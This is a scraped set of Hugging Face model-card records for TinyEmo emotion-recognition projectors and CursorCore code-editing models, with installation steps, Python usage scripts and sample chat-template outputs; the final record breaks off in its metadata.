| CLIP ViT-L/14 + TinyLLaMA 1.1 | 1.53B | 56.13% | [HF Projector 1.53B Link](https://huggingface.co/ggcristian/TinyEmo-CLIP-TinyLlama-1_1-Syn) |
| CLIP ViT-L/14 + Microsoft Phi 2 | 3.21B | 56.28% | [HF Projector 3.21B Link](https://huggingface.co/ggcristian/TinyEmo-CLIP-Phi-2) |
#### Custom Projectors with Local Weights
To use custom local weights or models, run the following:
```bash
conda activate projector_mps
bash projector_mps/scripts/eval_custom.sh
```
This allows you to specify different vision encoders, language models, and loss functions, as well as use your own projector weights.
## Acknowledgement
The Metric Projector was built from the foundations of [CLIP-E](https://arxiv.org/abs/2310.12062) paper!
Our codebase for the MM-LLM is forked from the [TinyLLaVA](https://github.com/TinyLLaVA/TinyLLaVA_Factory) project.
## Citation
```
@mastersthesis{gutierrez2024tinyemo,
title = {TinyEmo: Scaling down Emotional Reasoning via Metric Projection},
author = {Cristian Gutierrez},
year = 2024,
month = {September},
address = {Barcelona, Spain},
note = {Available at \url{https://ddd.uab.cat/record/301610?ln=en}},
school = {Universitat Autonoma de Barcelona (UAB)},
type = {Master's thesis in Computer Vision}
}
``` |
ggcristian/TinyEmo-CLIP-OpenELM-450M | ggcristian | 2024-10-10T06:58:15Z | 11 | 0 | null | [
"tinyemo",
"emotion",
"visual emotion recognition",
"affective computing",
"emotional classification",
"metric learning",
"image-classification",
"custom_code",
"en",
"arxiv:2410.07062",
"arxiv:2310.12062",
"base_model:apple/OpenELM-450M-Instruct",
"base_model:finetune:apple/OpenELM-450M-Instruct",
"region:us"
] | image-classification | 2024-10-02T08:03:38Z | ---
language:
- en
base_model:
- apple/OpenELM-450M-Instruct
- openai/clip-vit-large-patch14
pipeline_tag: image-classification
tags:
- emotion
- visual emotion recognition
- affective computing
- emotional classification
- metric learning
---
# TinyEmo-CLIP-OpenELM-450M
[[Paper]](https://arxiv.org/abs/2410.07062)
[TinyEmo GitHub repo](https://github.com/ggcr/TinyEmo)
[Metric Projector Card] [TinyEmo MM-LLM Card]
[[Reasoning Pre-training Dataset]](https://huggingface.co/datasets/ggcristian/TinyEmo-Pretrain-525k) [[Reasoning Fine-tuning Dataset]](https://huggingface.co/datasets/ggcristian/TinyEmo-EmoReason-175k) [[Reasoning Claude Dataset]](https://huggingface.co/datasets/ggcristian/TinyEmo-EmoReasonHQ-Claude-1.4k)
TinyEmo is a family of small multi-modal language models for emotional reasoning and classification. Our
approach features: (1) a synthetic emotional instruct dataset for both pre-training and fine-tuning stages, (2) a Metric Projector
that delegates classification from the language model allowing for more efficient training and inference, (3) a multi-modal large
language model (MM-LLM) for emotional reasoning, and (4) a semi-automated framework for bias detection. TinyEmo is able to
perform emotion classification and emotional reasoning, all while using substantially fewer parameters than comparable models.
This efficiency allows us to freely incorporate more diverse emotional datasets, enabling strong performance on classification tasks,
with our smallest model (700M parameters) outperforming larger state-of-the-art models based on general-purpose MM-LLMs
with over 7B parameters. Additionally, the Metric Projector allows for interpretability and indirect bias detection in large models
without additional training, offering an approach to understand and improve AI systems.
## Installation and Requirements
1. Clone this repository and navigate to the root of the project:
```
git clone https://github.com/ggcr/TinyEmo.git
cd TinyEmo
```
2. Create an environment and install dependencies:
```
conda create -n projector_mps python=3.10 -y
conda activate projector_mps
pip install --upgrade pip # enable PEP 660 support
pip install -e projector_mps/.
```
## Quickstart
### Metric Projector inference
We provide precomputed CLIP features for the Emotion6 dataset, and you can evaluate them using two methods:
#### Our Projectors from Hugging Face
To evaluate the projectors from Hugging Face, use the [scripts/eval.sh](https://github.com/ggcr/TinyEmo/blob/main/projector_mps/scripts/eval.sh) script:
```bash
conda activate projector_mps
bash projector_mps/scripts/eval.sh
```
Below is a table of the available projectors:
| Model Architecture | Parameters | Zero-shot Accuracy | HuggingFace Link |
|----------------------------------------| ---------- |--------------------|----------------------------------------------------------------------|
| CLIP ViT-L/14 + OpenELM-270M-I | 0.70B | 57.87% | [HF Projector 0.70B Link](https://huggingface.co/ggcristian/TinyEmo-CLIP-OpenELM-270M) |
| CLIP ViT-L/14 + OpenELM-450M-I | 0.88B | 55.24% | [HF Projector 0.88B Link](https://huggingface.co/ggcristian/TinyEmo-CLIP-OpenELM-450M) |
| CLIP ViT-L/14 + TinyLLaMA 1.1 | 1.53B | 56.13% | [HF Projector 1.53B Link](https://huggingface.co/ggcristian/TinyEmo-CLIP-TinyLlama-1_1-Syn) |
| CLIP ViT-L/14 + Microsoft Phi 2 | 3.21B | 56.28% | [HF Projector 3.21B Link](https://huggingface.co/ggcristian/TinyEmo-CLIP-Phi-2) |
#### Custom Projectors with Local Weights
To use custom local weights or models, run the following:
```bash
conda activate projector_mps
bash projector_mps/scripts/eval_custom.sh
```
This allows you to specify different vision encoders, language models, and loss functions, as well as use your own projector weights.
## Acknowledgement
The Metric Projector was built from the foundations of [CLIP-E](https://arxiv.org/abs/2310.12062) paper!
Our codebase for the MM-LLM is forked from the [TinyLLaVA](https://github.com/TinyLLaVA/TinyLLaVA_Factory) project.
## Citation
```
@mastersthesis{gutierrez2024tinyemo,
title = {TinyEmo: Scaling down Emotional Reasoning via Metric Projection},
author = {Cristian Gutierrez},
year = 2024,
month = {September},
address = {Barcelona, Spain},
note = {Available at \url{https://ddd.uab.cat/record/301610?ln=en}},
school = {Universitat Autonoma de Barcelona (UAB)},
type = {Master's thesis in Computer Vision}
}
``` |
TechxGenus/CursorCore-QW2.5-1.5B-LC | TechxGenus | 2024-10-10T06:43:13Z | 130 | 0 | transformers | [
"transformers",
"safetensors",
"qwen2",
"text-generation",
"code",
"conversational",
"arxiv:2410.07002",
"base_model:Qwen/Qwen2.5-Coder-1.5B",
"base_model:finetune:Qwen/Qwen2.5-Coder-1.5B",
"license:apache-2.0",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-10-05T14:08:14Z | ---
tags:
- code
base_model:
- Qwen/Qwen2.5-Coder-1.5B
library_name: transformers
pipeline_tag: text-generation
license: apache-2.0
---
# CursorCore: Assist Programming through Aligning Anything
<p align="center">
<a href="http://arxiv.org/abs/2410.07002">[📄arXiv]</a> |
<a href="https://hf.co/papers/2410.07002">[🤗HF Paper]</a> |
<a href="https://huggingface.co/collections/TechxGenus/cursorcore-series-6706618c38598468866b60e2">[🤖Models]</a> |
<a href="https://github.com/TechxGenus/CursorCore">[🛠️Code]</a> |
<a href="https://github.com/TechxGenus/CursorWeb">[Web]</a> |
<a href="https://discord.gg/Z5Tev8fV">[Discord]</a>
</p>
<hr>
- [CursorCore: Assist Programming through Aligning Anything](#cursorcore-assist-programming-through-aligning-anything)
- [Introduction](#introduction)
- [Models](#models)
- [Usage](#usage)
- [1) Normal chat](#1-normal-chat)
- [2) Assistant-Conversation](#2-assistant-conversation)
- [3) Web Demo](#3-web-demo)
- [Future Work](#future-work)
- [Citation](#citation)
- [Contribution](#contribution)
<hr>
## Introduction
CursorCore is a series of open-source models designed for AI-assisted programming. It aims to support features such as automated editing and inline chat, replicating the core abilities of closed-source AI-assisted programming tools like Cursor. This is achieved by aligning data generated through Programming-Instruct. Please read [our paper](http://arxiv.org/abs/2410.07002) to learn more.
<p align="center">
<img width="100%" alt="conversation" src="https://raw.githubusercontent.com/TechxGenus/CursorCore/main/pictures/conversation.png">
</p>

## Models
Our models have been open-sourced on Hugging Face. You can access our models here: [CursorCore-Series](https://huggingface.co/collections/TechxGenus/cursorcore-series-6706618c38598468866b60e2"). We also provide pre-quantized weights for GPTQ and AWQ here: [CursorCore-Quantization](https://huggingface.co/collections/TechxGenus/cursorcore-quantization-67066431f29f252494ee8cf3)
## Usage
Here are some examples of how to use our model:
### 1) Normal chat
Script:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-9B")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-9B",
torch_dtype=torch.bfloat16,
device_map="auto"
)
messages = [
{"role": "user", "content": "Hi!"},
]
prompt = tokenizer.apply_chat_template(
messages,
tokenize=False,
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512)
print(tokenizer.decode(outputs[0]))
````
Output:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>user
Hi!<|im_end|>
<|im_start|>assistant
Hello! I'm an AI language model and I can help you with any programming questions you might have. What specific problem or task are you trying to solve?<|im_end|>
````
### 2) Assistant-Conversation
In our work, we introduce a new framework of AI-assisted programming task. It is designed for aligning anything during programming process, used for the implementation of features like Tab and Inline Chat.
Script 1:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_wf
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-9B")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-9B",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [
{
"type": "code",
"lang": "python",
"code": """def quick_sort(arr):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
}
],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": ""
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_wf(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output 1:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>history
```python
def quick_sort(arr):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>current
```python
def quick_sort(array):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>assistant
<|next_start|>```python
def quick_sort(array):
if len(array) <= 1:
return array
pivot = array[len(array) // 2]
left = [x for x in array if x < pivot]
middle = [x for x in array if x == pivot]
right = [x for x in array if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|next_end|>
The user has provided a revised code change that corrects the parameter name from `arr` to `array` in the `quick_sort` function. This change ensures consistency in the function definition and avoids potential confusion or errors.
To implement this, we will:
1. Update the parameter name in the function definition from `arr` to `array`.
2. Ensure that all references to `arr` within the function are updated to `array`.
This will make the function definition and internal references consistent, improving code readability and maintainability.<|im_end|>
````
Script 2:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_wf
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-9B")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-9B",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": "Add Docstring."
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_wf(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output 2:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>current
```python
def quick_sort(array):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>user
Add Docstring.<|im_end|>
<|im_start|>assistant
<|next_start|>```python
def quick_sort(array):
"""
This is an implementation of the quick sort algorithm.
"""
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|next_end|><|im_end|>
````
For models in Locate-and-Change (LC) and Search-and-Replace (SR) formats, the output examples are as follows:
Script for LC:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_lc
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-1.5B-LC")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-1.5B-LC",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": "Add Docstring."
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_lc(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output for LC:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>current
```python
1 def quick_sort(array):
2 if len(arr) <= 1:
3 return arr
4 pivot = arr[len(arr) // 2]
5 left = [x for x in arr if x < pivot]
6 middle = [x for x in arr if x == pivot]
7 right = [x for x in arr if x > pivot]
8 return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>user
Add Docstring.<|im_end|>
<|im_start|>assistant
<|next_start|>1,1
```
'''This function will sort an array using quick sort algorithm'''
```<|next_end|>
To enhance the readability and maintainability of the code, we should add a docstring to the `quick_sort` function. A docstring provides a clear description of what the function does, which is particularly useful for other developers who might use or modify this code in the future.
The docstring will be added immediately after the function definition, explaining that the function uses the quick sort algorithm to sort an array. This will make the code more self-explanatory and easier to understand.
Here's the plan:
1. Add a docstring at the beginning of the `quick_sort` function.
2. Ensure the docstring is clear and concise, describing the purpose of the function.
This modification will improve the code's documentation without altering its functionality.<|im_end|>
````
Script for SR:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_sr
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-1.5B-SR")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-1.5B-SR",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": "Add Docstring."
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_sr(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output for SR:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>current
```python
def quick_sort(array):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>user
Add Docstring.<|im_end|>
<|im_start|>assistant
<|next_start|>```python
def quick_sort(array):
<|search_and_replace|>
def quick_sort(array):
"""
This function implements quick sort algorithm
"""
```<|next_end|><|im_end|>
````
### 3) Web Demo
We create a web demo for CursorCore. Please visit [CursorWeb](https://github.com/TechxGenus/CursorWeb) for more details.
## Future Work
CursorCore is still in a very early stage, and lots of work is needed to achieve a better user experience. For example:
- Repository-level editing support
- Better and faster editing formats
- Better user interface and presentation
- ...
## Citation
```bibtex
@article{jiang2024cursorcore,
title = {CursorCore: Assist Programming through Aligning Anything},
author = {Hao Jiang and Qi Liu and Rui Li and Shengyu Ye and Shijin Wang},
year = {2024},
journal = {arXiv preprint arXiv: 2410.07002}
}
```
## Contribution
Contributions are welcome! If you find any bugs or have suggestions for improvements, please open an issue or submit a pull request.
|
TechxGenus/CursorCore-QW2.5-7B-AWQ | TechxGenus | 2024-10-10T06:42:49Z | 79 | 0 | transformers | [
"transformers",
"safetensors",
"qwen2",
"text-generation",
"code",
"conversational",
"arxiv:2410.07002",
"base_model:TechxGenus/CursorCore-QW2.5-7B",
"base_model:quantized:TechxGenus/CursorCore-QW2.5-7B",
"license:apache-2.0",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"4-bit",
"awq",
"region:us"
] | text-generation | 2024-10-06T13:05:40Z | ---
tags:
- code
base_model:
- TechxGenus/CursorCore-QW2.5-7B
library_name: transformers
pipeline_tag: text-generation
license: apache-2.0
---
# CursorCore: Assist Programming through Aligning Anything
<p align="center">
<a href="http://arxiv.org/abs/2410.07002">[📄arXiv]</a> |
<a href="https://hf.co/papers/2410.07002">[🤗HF Paper]</a> |
<a href="https://huggingface.co/collections/TechxGenus/cursorcore-series-6706618c38598468866b60e2">[🤖Models]</a> |
<a href="https://github.com/TechxGenus/CursorCore">[🛠️Code]</a> |
<a href="https://github.com/TechxGenus/CursorWeb">[Web]</a> |
<a href="https://discord.gg/Z5Tev8fV">[Discord]</a>
</p>
<hr>
- [CursorCore: Assist Programming through Aligning Anything](#cursorcore-assist-programming-through-aligning-anything)
- [Introduction](#introduction)
- [Models](#models)
- [Usage](#usage)
- [1) Normal chat](#1-normal-chat)
- [2) Assistant-Conversation](#2-assistant-conversation)
- [3) Web Demo](#3-web-demo)
- [Future Work](#future-work)
- [Citation](#citation)
- [Contribution](#contribution)
<hr>
## Introduction
CursorCore is a series of open-source models designed for AI-assisted programming. It aims to support features such as automated editing and inline chat, replicating the core abilities of closed-source AI-assisted programming tools like Cursor. This is achieved by aligning data generated through Programming-Instruct. Please read [our paper](http://arxiv.org/abs/2410.07002) to learn more.
<p align="center">
<img width="100%" alt="conversation" src="https://raw.githubusercontent.com/TechxGenus/CursorCore/main/pictures/conversation.png">
</p>

## Models
Our models have been open-sourced on Hugging Face. You can access our models here: [CursorCore-Series](https://huggingface.co/collections/TechxGenus/cursorcore-series-6706618c38598468866b60e2"). We also provide pre-quantized weights for GPTQ and AWQ here: [CursorCore-Quantization](https://huggingface.co/collections/TechxGenus/cursorcore-quantization-67066431f29f252494ee8cf3)
## Usage
Here are some examples of how to use our model:
### 1) Normal chat
Script:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-9B")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-9B",
torch_dtype=torch.bfloat16,
device_map="auto"
)
messages = [
{"role": "user", "content": "Hi!"},
]
prompt = tokenizer.apply_chat_template(
messages,
tokenize=False,
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512)
print(tokenizer.decode(outputs[0]))
````
Output:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>user
Hi!<|im_end|>
<|im_start|>assistant
Hello! I'm an AI language model and I can help you with any programming questions you might have. What specific problem or task are you trying to solve?<|im_end|>
````
### 2) Assistant-Conversation
In our work, we introduce a new framework of AI-assisted programming task. It is designed for aligning anything during programming process, used for the implementation of features like Tab and Inline Chat.
Script 1:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_wf
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-9B")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-9B",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [
{
"type": "code",
"lang": "python",
"code": """def quick_sort(arr):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
}
],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": ""
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_wf(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output 1:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>history
```python
def quick_sort(arr):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>current
```python
def quick_sort(array):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>assistant
<|next_start|>```python
def quick_sort(array):
if len(array) <= 1:
return array
pivot = array[len(array) // 2]
left = [x for x in array if x < pivot]
middle = [x for x in array if x == pivot]
right = [x for x in array if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|next_end|>
The user has provided a revised code change that corrects the parameter name from `arr` to `array` in the `quick_sort` function. This change ensures consistency in the function definition and avoids potential confusion or errors.
To implement this, we will:
1. Update the parameter name in the function definition from `arr` to `array`.
2. Ensure that all references to `arr` within the function are updated to `array`.
This will make the function definition and internal references consistent, improving code readability and maintainability.<|im_end|>
````
Script 2:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_wf
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-9B")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-9B",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": "Add Docstring."
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_wf(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output 2:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>current
```python
def quick_sort(array):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>user
Add Docstring.<|im_end|>
<|im_start|>assistant
<|next_start|>```python
def quick_sort(array):
"""
This is an implementation of the quick sort algorithm.
"""
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|next_end|><|im_end|>
````
For models in Locate-and-Change (LC) and Search-and-Replace (SR) formats, the output examples are as follows:
Script for LC:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_lc
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-1.5B-LC")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-1.5B-LC",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": "Add Docstring."
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_lc(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output for LC:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>current
```python
1 def quick_sort(array):
2 if len(arr) <= 1:
3 return arr
4 pivot = arr[len(arr) // 2]
5 left = [x for x in arr if x < pivot]
6 middle = [x for x in arr if x == pivot]
7 right = [x for x in arr if x > pivot]
8 return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>user
Add Docstring.<|im_end|>
<|im_start|>assistant
<|next_start|>1,1
```
'''This function will sort an array using quick sort algorithm'''
```<|next_end|>
To enhance the readability and maintainability of the code, we should add a docstring to the `quick_sort` function. A docstring provides a clear description of what the function does, which is particularly useful for other developers who might use or modify this code in the future.
The docstring will be added immediately after the function definition, explaining that the function uses the quick sort algorithm to sort an array. This will make the code more self-explanatory and easier to understand.
Here's the plan:
1. Add a docstring at the beginning of the `quick_sort` function.
2. Ensure the docstring is clear and concise, describing the purpose of the function.
This modification will improve the code's documentation without altering its functionality.<|im_end|>
````
Script for SR:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_sr
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-1.5B-SR")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-1.5B-SR",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": "Add Docstring."
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_sr(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output for SR:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>current
```python
def quick_sort(array):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>user
Add Docstring.<|im_end|>
<|im_start|>assistant
<|next_start|>```python
def quick_sort(array):
<|search_and_replace|>
def quick_sort(array):
"""
This function implements quick sort algorithm
"""
```<|next_end|><|im_end|>
````
### 3) Web Demo
We create a web demo for CursorCore. Please visit [CursorWeb](https://github.com/TechxGenus/CursorWeb) for more details.
## Future Work
CursorCore is still in a very early stage, and lots of work is needed to achieve a better user experience. For example:
- Repository-level editing support
- Better and faster editing formats
- Better user interface and presentation
- ...
## Citation
```bibtex
@article{jiang2024cursorcore,
title = {CursorCore: Assist Programming through Aligning Anything},
author = {Hao Jiang and Qi Liu and Rui Li and Shengyu Ye and Shijin Wang},
year = {2024},
journal = {arXiv preprint arXiv: 2410.07002}
}
```
## Contribution
Contributions are welcome! If you find any bugs or have suggestions for improvements, please open an issue or submit a pull request.
|
TechxGenus/CursorCore-QW2.5-7B-GPTQ | TechxGenus | 2024-10-10T06:42:45Z | 77 | 0 | transformers | [
"transformers",
"safetensors",
"qwen2",
"text-generation",
"code",
"conversational",
"arxiv:2410.07002",
"base_model:TechxGenus/CursorCore-QW2.5-7B",
"base_model:quantized:TechxGenus/CursorCore-QW2.5-7B",
"license:apache-2.0",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"4-bit",
"gptq",
"region:us"
] | text-generation | 2024-10-08T04:58:54Z | ---
tags:
- code
base_model:
- TechxGenus/CursorCore-QW2.5-7B
